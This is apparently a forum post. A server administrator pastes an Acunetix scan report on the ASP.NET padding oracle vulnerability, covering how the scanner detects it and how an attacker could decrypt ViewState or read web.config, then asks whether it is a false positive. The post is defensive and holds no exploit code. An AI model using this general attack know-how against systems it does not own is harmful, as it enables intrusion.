- Code: Select all
ASP.NET Padding Oracle Vulnerability
ASP.Net uses encryption to hide sensitive data and protect it from tampering by the client. However, a vulnerability in the ASP.Net encryption implementation can allow an attacker to decrypt and tamper with this data. This vulnerability exists in all versions of ASP.NET.
This vulnerability affects /.
Discovered by: Scripting (ASP_NET_Oracle_Padding.script).
Acunetix detected this vulnerability by comparing the HTTP response status and body for two different requests (one request when the padding is incorrect and another one where the encrypted text is not valid). If the body AND/OR status are different, this vulnerability can be exploited.
The impact of this vulnerability
An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server.
The resource cannot be found.
Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.
Requested URL: /WebResource.axd
1. While it's not a good practice, I don't think someone can view my data from this error only. What do you think? Is this false positive results?
2. I also want to know if Accunetix scan my web server vulnerabilites. If not, can you recommend a good one? I'm using windows server 2003, and trying to convince my boss to upgrade it, but he wants to know if I can hack it first before he give me money to upgrade it.